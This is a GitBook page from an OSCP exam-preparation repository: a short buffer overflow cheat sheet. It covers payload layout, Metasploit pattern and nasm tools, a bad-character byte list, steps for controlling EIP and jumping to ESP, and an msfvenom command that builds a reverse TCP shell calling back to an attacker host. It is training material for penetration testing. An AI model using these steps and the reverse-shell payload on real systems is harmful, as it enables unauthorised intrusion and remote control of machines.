OSCP
Search…
OSCP
All About OSCP
OSCP- One Page Repository
About the Author
Basic Linux & Windows Commands
Recon (Scanning & Enumeration)
Web Application
Brute Force
Shells
Transferring files
Priv Escalation
Post Exploitation
Pivoting
Buffer Overflow
Buffer overflow
Buffer overflow Step by Step
Main Tools
MISC
CheatSheet (Short)
OSCP/ Vulnhub Practice learning
Powered By GitBook
Buffer Overflow
1
​
2
#Buffer Overflow:
3
​
4
# Payload
5
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>
6
​
7
# Pattern create
8
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>
9
​
10
# Pattern offset
11
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <address>
12
​
13
# nasm
14
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
15
nasm > jmp eax
16
​
17
# Bad characters
18
badchars = (
19
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
20
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
21
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
22
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
23
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
24
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
25
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
26
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
27
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
28
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
29
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
30
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
31
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
32
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
33
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
34
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
35
​
36
​
37
Buffer Overflow
38
Determine length of overflow trigger w/ binary search "A"x1000
39
Determine exact EIP with pattern_create.rb & pattern_offset.rb
40
Determine badchars to make sure all of your payload is getting through
41
Develop exploit
42
Is the payload right at ESP
43
JMP ESP
44
Is the payload before ESP
45
sub ESP, 200 and then JMP ESP
46
or
47
call [ESP-200]
48
msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename
49
Make sure it fits your payload length above
50
Gain shell, local priv esc or rooted already?
51
​
Copied!
Previous
Pivotind understanding
Next
Buffer overflow
Last modified 2yr ago
Copy link